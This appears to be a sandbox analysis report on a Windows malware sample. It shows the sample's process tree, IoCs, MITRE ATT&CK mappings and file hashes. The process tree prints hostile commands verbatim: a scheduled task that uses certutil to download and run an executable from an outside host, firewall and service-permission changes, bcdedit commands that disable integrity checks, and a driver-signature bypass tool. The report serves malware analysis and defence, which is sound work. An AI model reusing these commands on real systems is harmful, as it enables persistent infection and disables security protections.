Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

er.exeer.execsrss.exechrome.exechrome.exe

pid process

1648 er.exe
692 er.exe
1584 csrss.exe
1584 csrss.exe
908 chrome.exe
908 chrome.exe
2192 chrome.exe
2192 chrome.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

476

pid	process
1648	er.exe
692	er.exe
1584	csrss.exe
1584	csrss.exe
908	chrome.exe
908	chrome.exe
2192	chrome.exe
2192	chrome.exe

pid	process
476

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

er.execsrss.exesc.exeupdateprofile-15.exe

description	pid	process
Token: SeDebugPrivilege	1648	er.exe
Token: SeImpersonatePrivilege	1648	er.exe
Token: SeSystemEnvironmentPrivilege	1584	csrss.exe
Token: SeSecurityPrivilege	1724	sc.exe
Token: SeSecurityPrivilege	1724	sc.exe
Token: SeRestorePrivilege	1488	updateprofile-15.exe
Token: SeBackupPrivilege	1488	updateprofile-15.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

chrome.exe

pid process

2192 chrome.exe
2192 chrome.exe
2192 chrome.exe

pid	process
2192	chrome.exe
2192	chrome.exe
2192	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

er.exeer.execmd.exepatch.exe

description	pid	process	target process
PID 1648 wrote to memory of 1164	1648	er.exe	rundll32.exe
PID 1648 wrote to memory of 1164	1648	er.exe	rundll32.exe
PID 1648 wrote to memory of 1164	1648	er.exe	rundll32.exe
PID 1648 wrote to memory of 1164	1648	er.exe	rundll32.exe
PID 1648 wrote to memory of 1164	1648	er.exe	rundll32.exe
PID 1648 wrote to memory of 1164	1648	er.exe	rundll32.exe
PID 1648 wrote to memory of 1164	1648	er.exe	rundll32.exe
PID 692 wrote to memory of 952	692	er.exe	rundll32.exe
PID 692 wrote to memory of 952	692	er.exe	rundll32.exe
PID 692 wrote to memory of 952	692	er.exe	rundll32.exe
PID 692 wrote to memory of 952	692	er.exe	rundll32.exe
PID 692 wrote to memory of 952	692	er.exe	rundll32.exe
PID 692 wrote to memory of 952	692	er.exe	rundll32.exe
PID 692 wrote to memory of 952	692	er.exe	rundll32.exe
PID 692 wrote to memory of 1568	692	er.exe	cmd.exe
PID 692 wrote to memory of 1568	692	er.exe	cmd.exe
PID 692 wrote to memory of 1568	692	er.exe	cmd.exe
PID 692 wrote to memory of 1568	692	er.exe	cmd.exe
PID 1568 wrote to memory of 2024	1568	cmd.exe	netsh.exe
PID 1568 wrote to memory of 2024	1568	cmd.exe	netsh.exe
PID 1568 wrote to memory of 2024	1568	cmd.exe	netsh.exe
PID 692 wrote to memory of 1584	692	er.exe	csrss.exe
PID 692 wrote to memory of 1584	692	er.exe	csrss.exe
PID 692 wrote to memory of 1584	692	er.exe	csrss.exe
PID 692 wrote to memory of 1584	692	er.exe	csrss.exe
PID 1520 wrote to memory of 816	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 816	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 816	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 1248	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 1248	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 1248	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 796	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 796	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 796	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 680	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 680	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 680	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 328	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 328	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 328	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 604	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 604	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 604	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 1212	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 1212	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 1212	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 1492	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 1492	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 1492	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 1344	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 1344	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 1344	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 828	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 828	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 828	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 1056	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 1056	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 1056	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 1500	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 1500	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 1500	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 1140	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 1140	1520	patch.exe	bcdedit.exe
PID 1520 wrote to memory of 1140	1520	patch.exe	bcdedit.exe

C:\Users\Admin\AppData\Local\Temp\er.exe
"C:\Users\Admin\AppData\Local\Temp\er.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1648

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\system32\gameux.dll,GameUXShim {5edb1ddd-6a21-414f-bc6e-e6e5379b875c};C:\Users\Admin\AppData\Local\Temp\er.exe;1648
2⤵
- Blocklisted process makes network request
- Modifies registry class
PID:1164

C:\Users\Admin\AppData\Local\Temp\er.exe
"C:\Users\Admin\AppData\Local\Temp\er.exe"
2⤵
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:692

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\system32\gameux.dll,GameUXShim {5edb1ddd-6a21-414f-bc6e-e6e5379b875c};C:\Users\Admin\AppData\Local\Temp\er.exe;692
3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:952

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
- Suspicious use of WriteProcessMemory
PID:1568

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
- Modifies data under HKEY_USERS
PID:2024

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1584

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:1844

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:976

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1520

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
5⤵
- Modifies boot configuration data using bcdedit
PID:816

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
5⤵
- Modifies boot configuration data using bcdedit
PID:1248

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
5⤵
- Modifies boot configuration data using bcdedit
PID:796

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
5⤵
- Modifies boot configuration data using bcdedit
PID:680

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
5⤵
- Modifies boot configuration data using bcdedit
PID:328

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
5⤵
- Modifies boot configuration data using bcdedit
PID:604

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
5⤵
- Modifies boot configuration data using bcdedit
PID:1212

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
5⤵
- Modifies boot configuration data using bcdedit
PID:1492

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
5⤵
- Modifies boot configuration data using bcdedit
PID:1344

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
5⤵
- Modifies boot configuration data using bcdedit
PID:828

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
5⤵
- Modifies boot configuration data using bcdedit
PID:1056

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
5⤵
- Modifies boot configuration data using bcdedit
PID:1500

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
5⤵
- Modifies boot configuration data using bcdedit
PID:1140

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:796

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
4⤵
- Executes dropped EXE
PID:528

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
4⤵
- Executes dropped EXE
PID:628

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
5⤵
PID:1608

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1724

C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
4⤵
- Executes dropped EXE
PID:904

C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2020

C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1488

C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
4⤵
- Executes dropped EXE
PID:1900

C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe"
5⤵
- Executes dropped EXE
PID:796

C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
4⤵
- Executes dropped EXE
PID:1588

C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe"
5⤵
- Executes dropped EXE
PID:2088

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" http://humisnee.com/test.php?uuid=ff0348af-e2e5-49ec-9491-e980d37feaea&browser=chrome
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2192

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7fef6206e00,0x7fef6206e10,0x7fef6206e20
7⤵
PID:2260

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1032,6807380835215427805,6139682239562725928,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1268 /prefetch:8
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:908

C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe
C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe
4⤵
- Executes dropped EXE
PID:2120

C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe
C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe
4⤵
- Executes dropped EXE
PID:2220

C:\Users\Admin\AppData\Local\Temp\csrss\m672.exe
C:\Users\Admin\AppData\Local\Temp\csrss\m672.exe
4⤵
- Executes dropped EXE
PID:2328

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1808

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Impair Defenses

T1562

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
MD5
b9def7f516a16683f89e5e7f4e44c125

SHA1
ab88110fb7724bf5c4b44bc1ec64b3bac016b9a0

SHA256
f35759a19d0889c1fabf924c249ed3b325fe8b8499d71106499b5f5d50f053ca

SHA512
457719e18b862af3c3ceaccef75ac2aef6838cf1377e7141daf238936ec7cadc6ad9626d82d8490bed0da2cc04fba6fee57eca9f781fd0821d12c53528e05f34

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
MD5
d98e78fd57db58a11f880b45bb659767

SHA1
ab70c0d3bd9103c07632eeecee9f51d198ed0e76

SHA256
414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

SHA512
aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
MD5
941b755a404a616a55ea57ff4dbfe184

SHA1
946096ca05b666f9ef7c8bfb86a34a9435c24ab7

SHA256
9afabdf762ea2e412019ce0f6004f7fe1c948f2b36e1aab347e623fedd5ef440

SHA512
6a8afe8b6cfdeb86918b0eac83df316d43bc47bb8ba3a55c5ecb1fcc9aab36031f744b75f2afe53ff329b0a30aa3708332efda1592369c86fd12ae013335067a

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
MD5
941b755a404a616a55ea57ff4dbfe184

SHA1
946096ca05b666f9ef7c8bfb86a34a9435c24ab7

SHA256
9afabdf762ea2e412019ce0f6004f7fe1c948f2b36e1aab347e623fedd5ef440

SHA512
6a8afe8b6cfdeb86918b0eac83df316d43bc47bb8ba3a55c5ecb1fcc9aab36031f744b75f2afe53ff329b0a30aa3708332efda1592369c86fd12ae013335067a

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\m672.exe
MD5
1496f269a788b609062adbd300f2d18c

SHA1
93cca5098d5a87f673624dcc5ab7d9de4f4bbdf7

SHA256
9d41d85b30958480be3f7eeff32d2cf4ebe2f1c5790dedfd8cbac0a3c8b58f03

SHA512
527722a7fb5d68f441fab4550273166633e8a555eb04c060fba50bda7f9e72060a0fbe9e495905f26b72bd58a03a25ab6797e87ff187c1c37c14f41922ca0914

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe
MD5
0a13d106fa3997a0c911edd5aa0e147a

SHA1
36fae45bbb17d7c3fc2cc4807057636558a416e3

SHA256
5e46ecffcff9440e97bf4f0a85ad34132407f925b27a8759f5a01de5ea4da6af

SHA512
ae2a2c7bc9dfda5d6012a8bab80c7be92762bb63c6e73de4f6b21768faab2637d51c147defe454bf8504cc2845a1914bbbeb1519e0be3343380b011da3467da4

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe
MD5
d54ade674cb0c3e6d322ed7380e8adf6

SHA1
d10dd83f261a9e4fed3f86b6d4e798b7f3b14b73

SHA256
5191548b8edf4b98e623f055f5205e2db17aa220c28928b1da1c3a9ba1a75ee0

SHA512
5e0dba44f7dea3929b172b48e7c9492d06c59599cbc433f8be9e53c81935f1b5fe2dfb2404b41b7d9a7db39dedf1115ea23d454d2306f314af17f7ddeedc5065

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
MD5
13aaafe14eb60d6a718230e82c671d57

SHA1
e039dd924d12f264521b8e689426fb7ca95a0a7b

SHA256
f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

SHA512
ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
MD5
c6e81bac5a3385a0a9cef0bf9b45c624

SHA1
f52f673d68a66f212c25687aae6c054d89c9b47a

SHA256
3414ddda2d8e2d44f7e33cf513de0c6a10d593e0358ad55586657d42682ffb5c

SHA512
328d5e7fe15d22a0b23ada1be686363748c9c6beb90931bb1e58a7308e9a75f022236f7960408b89fba554a1d12deb1d047c9da9a8a45aeb494f192e594d4855

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
MD5
c6e81bac5a3385a0a9cef0bf9b45c624

SHA1
f52f673d68a66f212c25687aae6c054d89c9b47a

SHA256
3414ddda2d8e2d44f7e33cf513de0c6a10d593e0358ad55586657d42682ffb5c

SHA512
328d5e7fe15d22a0b23ada1be686363748c9c6beb90931bb1e58a7308e9a75f022236f7960408b89fba554a1d12deb1d047c9da9a8a45aeb494f192e594d4855

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
MD5
9c84377ef100ddb897aab7f8a923c01e

SHA1
9750679980141b268eb5c0d9e593d312e0069098

SHA256
c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d

SHA512
1746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
MD5
9c84377ef100ddb897aab7f8a923c01e

SHA1
9750679980141b268eb5c0d9e593d312e0069098

SHA256
c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d

SHA512
1746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
MD5
9c84377ef100ddb897aab7f8a923c01e

SHA1
9750679980141b268eb5c0d9e593d312e0069098

SHA256
c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d

SHA512
1746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
MD5
9a4b7b0849a274f6f7ac13c7577daad8

SHA1
51219052fd31598113d1f30d938a560dd1434163

SHA256
c1d5a585fce188423d31df3ea806272f3daa5eb989e18e9ecf3d94b97b965f8e

SHA512
cd12f75e9198c88a3e1425c0c39956a50b10369074a3f35aba67868d3c02b5877bc6762292b35fbca37e80af4db6c02403ab3a9d1afc66ff38ce2f0d15fdcfce

Download Submit
C:\Windows\rss\csrss.exe
MD5
160dd398272fd4fdf51f410adad9a51b

SHA1
f49489e7960978dd7dbb1784b0c67b1fd540926d

SHA256
2bd6567a2a3321019d204a42484e626c8b98ecbaf068b66833fc15a737c1f42e

SHA512
8e9d8eadc207bc4ee11d7971a7dc75f1cacd94579c03f406128c302e85c50c0f58e5723d3da74f0c0049b18cdde1842ef6658dbee5d897154377fb39fae4ead4

Download Submit
C:\Windows\windefender.exe
MD5
6512ae7c9f36206f6433f78296102419

SHA1
abd1312c5727ac2a64ae5add1706d47cd65386eb

SHA256
6b9468efee35a8454a7fb395f43e5bdd14df918437661846d7d6ec199ba08883

SHA512
a6ece95ec60ac11b8454586f7a67a70b7bfc963691e79f0711b37280a647bddffb57b119b458d766f859841d775a56ebb43b2c63ad50b6fad6df8354ae51473f

Download Submit
C:\Windows\windefender.exe
MD5
6512ae7c9f36206f6433f78296102419

SHA1
abd1312c5727ac2a64ae5add1706d47cd65386eb

SHA256
6b9468efee35a8454a7fb395f43e5bdd14df918437661846d7d6ec199ba08883

SHA512
a6ece95ec60ac11b8454586f7a67a70b7bfc963691e79f0711b37280a647bddffb57b119b458d766f859841d775a56ebb43b2c63ad50b6fad6df8354ae51473f

Download Submit
C:\Windows\windefender.exe
MD5
6512ae7c9f36206f6433f78296102419

SHA1
abd1312c5727ac2a64ae5add1706d47cd65386eb

SHA256
6b9468efee35a8454a7fb395f43e5bdd14df918437661846d7d6ec199ba08883

SHA512
a6ece95ec60ac11b8454586f7a67a70b7bfc963691e79f0711b37280a647bddffb57b119b458d766f859841d775a56ebb43b2c63ad50b6fad6df8354ae51473f

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
MD5
d98e78fd57db58a11f880b45bb659767

SHA1
ab70c0d3bd9103c07632eeecee9f51d198ed0e76

SHA256
